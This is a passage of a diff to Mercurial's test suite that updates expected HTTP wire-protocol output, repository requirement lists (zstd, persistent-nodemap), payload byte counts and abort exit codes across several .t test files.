x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (307) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (298) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
- write(38 from 38) -> (260) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
- write(9 from 9) -> (251) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
- write(64 from 64) -> (187) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
- write(9 from 9) -> (178) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (169) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
- write(41 from 41) -> (128) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
- write(9 from 9) -> (119) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (110) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc)
- write(35 from 35) -> (75) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc)
- write(9 from 9) -> (66) 4\\r\\n\x00\x00\x00'\\r\\n (esc)
- write(45 from 45) -> (21) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc)
+ $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -22
+ write(9 from 9) -> (747) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (738) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
+ write(47 from 47) -> (691) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
+ write(9 from 9) -> (682) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
+ write(473 from 473) -> (209) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (200) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (191) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
+ write(38 from 38) -> (153) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
+ write(9 from 9) -> (144) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
+ write(64 from 64) -> (80) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
+ write(9 from 9) -> (71) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (62) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
+ write(41 from 41) -> (21) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
write(9 from 9) -> (12) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
write(9 from 9) -> (3) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
write(3 from 5) -> (0) 0\r\n
--- a/tests/test-http-bundle1.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-http-bundle1.t Tue Apr 20 11:01:06 2021 -0400
@@ -38,7 +38,8 @@
#if no-reposimplestore
$ hg clone --stream http://localhost:$HGPORT/ copy 2>&1
streaming all changes
- 6 files to transfer, 606 bytes of data
+ 6 files to transfer, 606 bytes of data (no-zstd !)
+ 6 files to transfer, 608 bytes of data (zstd !)
transferred * bytes in * seconds (*/sec) (glob)
searching for changes
no changes found
@@ -225,7 +226,8 @@
#if no-reposimplestore
$ hg clone http://user:pass@localhost:$HGPORT2/ dest 2>&1
streaming all changes
- 7 files to transfer, 916 bytes of data
+ 7 files to transfer, 916 bytes of data (no-zstd !)
+ 7 files to transfer, 919 bytes of data (zstd !)
transferred * bytes in * seconds (*/sec) (glob)
searching for changes
no changes found
--- a/tests/test-http-protocol.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-http-protocol.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,8 +1,13 @@
#require no-chg
+persistent-nodemap is not enabled by default. It is not relevant for this test
+so disable it.
+
$ . $TESTDIR/wireprotohelpers.sh
$ cat >> $HGRCPATH << EOF
+ > [format]
+ > use-persistent-nodemap = no
> [web]
> push_ssl = false
> allow_push = *
@@ -321,7 +326,7 @@
s> Content-Type: application/mercurial-cbor\r\n
s> Content-Length: *\r\n (glob)
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
sending heads command
s> setsockopt(6, 1, 1) -> None (?)
s> POST /api/exp-http-v2-0003/ro/heads HTTP/1.1\r\n
@@ -437,7 +442,7 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-0.1\r\n
- s> Content-Length: 503\r\n
+ s> Content-Length: 484\r\n
s> \r\n
s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
@@ -474,7 +479,7 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-0.1\r\n
- s> Content-Length: 503\r\n
+ s> Content-Length: 484\r\n
s> \r\n
real URL is http://$LOCALIP:$HGPORT/redirected (glob)
s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
@@ -745,7 +750,7 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-0.1\r\n
- s> Content-Length: 503\r\n
+ s> Content-Length: 484\r\n
s> \r\n
real URL is http://$LOCALIP:$HGPORT/redirected (glob)
s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
--- a/tests/test-http.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-http.t Tue Apr 20 11:01:06 2021 -0400
@@ -29,7 +29,8 @@
#if no-reposimplestore
$ hg clone --stream http://localhost:$HGPORT/ copy 2>&1
streaming all changes
- 9 files to transfer, 715 bytes of data
+ 9 files to transfer, 715 bytes of data (no-zstd !)
+ 9 files to transfer, 717 bytes of data (zstd !)
transferred * bytes in * seconds (*/sec) (glob)
updating to branch default
4 files updated, 0 files merged, 0 files removed, 0 files unresolved
@@ -348,20 +349,20 @@
list of changesets:
7f4e523d01f2cc3765ac8934da3d14db775ff872
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
sending unbundle command
- sending 1040 bytes
+ sending 1023 bytes
devel-peer-request: POST http://localhost:$HGPORT2/?cmd=unbundle
- devel-peer-request: Content-length 1040
+ devel-peer-request: Content-length 1023
devel-peer-request: Content-type application/mercurial-0.1
devel-peer-request: Vary X-HgArg-1,X-HgProto-1
devel-peer-request: X-hgproto-1 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull
devel-peer-request: 16 bytes of commands arguments in headers
- devel-peer-request: 1040 bytes of data
+ devel-peer-request: 1023 bytes of data
devel-peer-request: finished in *.???? seconds (200) (glob)
bundle2-input-bundle: no-transaction
bundle2-input-part: "reply:changegroup" (advisory) (params: 0 advisory) supported
@@ -382,6 +383,7 @@
devel-peer-request: 16 bytes of commands arguments in headers
devel-peer-request: finished in *.???? seconds (200) (glob)
received listkey for "phases": 15 bytes
+ (sent 9 HTTP requests and * bytes; received * bytes in responses) (glob) (?)
$ hg rollback -q
$ sed 's/.*] "/"/' < ../access.log
@@ -503,7 +505,7 @@
requesting all changes
remote: abort: this is an exercise
abort: pull failed on remote
- [255]
+ [100]
$ cat error.log
disable pull-based clones
@@ -515,7 +517,7 @@
remote: abort: server has pull-based clones disabled
abort: pull failed on remote
(remove --pull if specified or upgrade Mercurial)
- [255]
+ [100]
#if no-reposimplestore
... but keep stream clones working
--- a/tests/test-inherit-mode.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-inherit-mode.t Tue Apr 20 11:01:06 2021 -0400
@@ -134,6 +134,8 @@
00660 ../push/.hg/00changelog.i
00770 ../push/.hg/cache/
00660 ../push/.hg/cache/branch2-base
+ 00660 ../push/.hg/cache/rbc-names-v1
+ 00660 ../push/.hg/cache/rbc-revs-v1
00660 ../push/.hg/dirstate
00660 ../push/.hg/requires
00770 ../push/.hg/store/
--- a/tests/test-init.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-init.t Tue Apr 20 11:01:06 2021 -0400
@@ -21,6 +21,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -59,6 +61,8 @@
$ hg --config format.usestore=false init old
$ checknewrepo old
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
testonly-simplestore (reposimplestore !)
sparserevlog
@@ -70,6 +74,8 @@
store created
00changelog.i created
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -83,6 +89,8 @@
00changelog.i created
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -96,6 +104,8 @@
00changelog.i created
dotencode
fncache
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
store
testonly-simplestore (reposimplestore !)
@@ -213,6 +223,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -233,6 +245,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -249,6 +263,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-install.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-install.t Tue Apr 20 11:01:06 2021 -0400
@@ -184,7 +184,7 @@
$ cd $TESTTMP
$ unset PYTHONPATH
-#if py3 ensurepip
+#if py3 ensurepip network-io
$ "$PYTHON" -m venv installenv >> pip.log
Hack: Debian does something a bit different in ensurepip.bootstrap. This makes
@@ -197,8 +197,10 @@
Note: we use this weird path to run pip and hg to avoid platform differences,
since it's bin on most platforms but Scripts on Windows.
- $ ./installenv/*/pip install --no-index $TESTDIR/.. >> pip.log
+ $ ./installenv/*/pip install $TESTDIR/.. >> pip.log
Failed building wheel for mercurial (?)
+ WARNING: You are using pip version *; however, version * is available. (glob) (?)
+ You should consider upgrading via the '$TESTTMP/installenv/bin/python* -m pip install --upgrade pip' command. (glob) (?)
$ ./installenv/*/hg debuginstall || cat pip.log
checking encoding (ascii)...
checking Python executable (*) (glob)
@@ -222,17 +224,17 @@
no problems detected
#endif
-#if virtualenv no-py3
+#if virtualenv no-py3 network-io
Note: --no-site-packages is the default for all versions enabled by hghave
- $ "$PYTHON" -m virtualenv --never-download installenv >> pip.log
+ $ "$PYTHON" -m virtualenv installenv >> pip.log
DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. (?)
DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support (?)
Note: we use this weird path to run pip and hg to avoid platform differences,
since it's bin on most platforms but Scripts on Windows.
- $ ./installenv/*/pip install --no-index $TESTDIR/.. >> pip.log
+ $ ./installenv/*/pip install $TESTDIR/.. >> pip.log
DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. (?)
DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support (?)
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality. (?)
--- a/tests/test-largefiles-misc.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-largefiles-misc.t Tue Apr 20 11:01:06 2021 -0400
@@ -675,6 +675,7 @@
searching for changes
no changes found
largefiles: no files to upload
+ [1]
check messages when there are files to upload:
--- a/tests/test-largefiles.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-largefiles.t Tue Apr 20 11:01:06 2021 -0400
@@ -1751,7 +1751,7 @@
$ hg rm sub2/large6
$ hg up -r.
abort: outstanding uncommitted merge
- [255]
+ [20]
- revert should be able to revert files introduced in a pending merge
$ hg revert --all -r .
--- a/tests/test-lfconvert.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-lfconvert.t Tue Apr 20 11:01:06 2021 -0400
@@ -99,6 +99,8 @@
fncache
generaldelta
largefiles
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-lfs-largefiles.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-lfs-largefiles.t Tue Apr 20 11:01:06 2021 -0400
@@ -293,6 +293,8 @@
fncache
generaldelta
lfs
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-lfs-serve-access.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-lfs-serve-access.t Tue Apr 20 11:01:06 2021 -0400
@@ -66,7 +66,7 @@
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 400 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
- $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
+ $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 400 - (glob)
$ rm -f $TESTTMP/access.log $TESTTMP/errors.log
@@ -110,9 +110,7 @@
bundle2-input-part: "listkeys" (params: 1 mandatory) supported
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
- bundle2-input-part: "cache:rev-branch-cache" (advisory) supported
- bundle2-input-part: total payload size 39
- bundle2-input-bundle: 4 parts total
+ bundle2-input-bundle: 3 parts total
checking for updated bookmarks
updating the branch cache
added 1 changesets with 1 changes to 1 files
@@ -167,7 +165,7 @@
$LOCALIP - - [$LOGDATE$] "POST /missing/objects/batch HTTP/1.1" 404 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=capabilities HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
- $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
+ $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
$LOCALIP - - [$LOGDATE$] "POST /subdir/mount/point/.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point/.hg/lfs/objects/f03217a32529a28a42d03b1244fe09b6e0f9fd06d7b966d4d50567be2abe6c0e HTTP/1.1" 200 - (glob)
@@ -313,7 +311,7 @@
$ cat $TESTTMP/access.log
$LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
- $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
